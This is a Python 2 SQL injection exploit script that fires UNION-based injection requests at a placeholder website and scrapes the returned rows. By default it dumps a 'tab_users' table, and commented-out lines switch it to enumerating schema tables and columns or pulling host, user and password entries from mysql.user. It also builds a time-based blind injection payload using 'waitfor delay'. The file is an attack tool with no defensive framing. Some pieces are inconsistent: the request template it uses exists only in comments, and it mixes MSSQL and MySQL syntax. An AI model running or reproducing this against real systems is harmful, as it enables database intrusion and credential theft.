union_sqli_extractor.py

target_protocol="http"
target_url="www.some_url.pt"
target_path="/some/path.php?cmd=whatever&id=-5" 
target=target_protocol+"://"+target_url+target_path
target_port=80
target_method="GET"

DEBUG_MODE=False
DELAY=1
OPTIMUS_PRIME=False
logfile = open('sqli.log', 'w+')

#BASE_REQ1=" UNION ALL select 1,${fieldname},3 from ${tablename} ${limit}&sid=81lk0elppnkagkfju95mgnmmf5&chave=&lang=pt"
#BASE_REQ=" UNION ALL select 1,${fieldname},3 from ${tablename} ${limit}&sid=81lk0elppnkagkfju95mgnmmf5&chave=&lang=pt"

def get_column_names(table_name):
    return "IF(ASCII(lower(substring((SELECT TOP 1 column_name FROM information_schema.columns WHERE table_name = \'"+table_name+"\'${denial}),${char},1)))=${ascii})waitfor delay '0:0:"+str(DELAY)+"';--"

import httplib
import time,sys
import urllib,urlparse
import re

main_start=time.time()

def url_fix(s, charset='utf-8'):
    if isinstance(s, unicode):
        s = s.encode(charset, 'ignore')
    scheme, netloc, path, qs, anchor = urlparse.urlsplit(s)
    path = urllib.quote(path, '/%')
    qs = urllib.quote_plus(qs, ':&=') 
    return urlparse.urlunsplit((scheme, netloc, path, qs, anchor))

def sqli_inject(http_try):
    httpServ = httplib.HTTPConnection(target_url, target_port)
    httpServ.connect()
    if DEBUG_MODE: logfile.write(http_try+'\n')
    httpServ.request(target_method, url_fix(http_try))
    response = httpServ.getresponse()
    return response.read(8000)

def handle_result(response): #[2250:2500]
    result = ''
    try:
        result = response[2250:2500].split('<span class=\"cor\">')[1].rsplit('</span>')[0]
    except:
        result = '---'
    return result
#    print response
#    p = re.compile(r'<span class=\"cor\">(.*?)</span>', re.I | re.S | re.M)
#    res = p.match(response)
#    print res.groups()
#    return res.group(1)

def get_sqli_table(sqli, fieldname, tablename, limit_begin=0, limit_end=2):
    http_try = target_path + sqli.replace('${fieldname}',fieldname).replace('${tablename}',tablename)
    result,current_line=[''],''
    for index in range(limit_begin, limit_end+1):
        http_try_index=http_try.replace('${limit}','LIMIT %d,%d' % (index,index+1))
#        print http_try_index
        result = handle_result(sqli_inject(http_try_index))
        if result == '---':
            break
        else:
            print result or http_try_index
        if index == limit_end:
            print 'reached LIMIT_END setting, there could be more contents and you don\'t know :('
    return result
            # print '?',

#get_sqli_content(TABLE_CONTENT6,'name')	    
field_name,table_name='id','tab_users'
#field_name,table_name='concat(table_schema,0x3a,table_name,0x3a,table_rows)','information_schema.tables' 
#field_name,table_name='concat(table_schema,0x3a,table_name,0x3a,table_type,0x3a,table_rows)','information_schema.tables'
#field_name,table_name='concat(column_name,0x3a,data_type)','information_schema.columns WHERE table_name = \'tab_users\''	    
#field_name,table_name='concat(id,0x3a,data,0x3a,accao)','tab_logs_cron'
#field_name,table_name='concat(host,0x3a,user,0x3a,password)','mysql.user'


#field_name,table_name='column_name','information_schema.columns WHERE table_name =\'table_privileges\''

print ""
print "Listing %s(%s):" % (field_name,table_name)
print "============================================================================"
get_sqli_table(BASE_REQ,field_name,table_name,0,200)
print ""
print "Total time taken: "+str(time.time() - main_start)
logfile.close()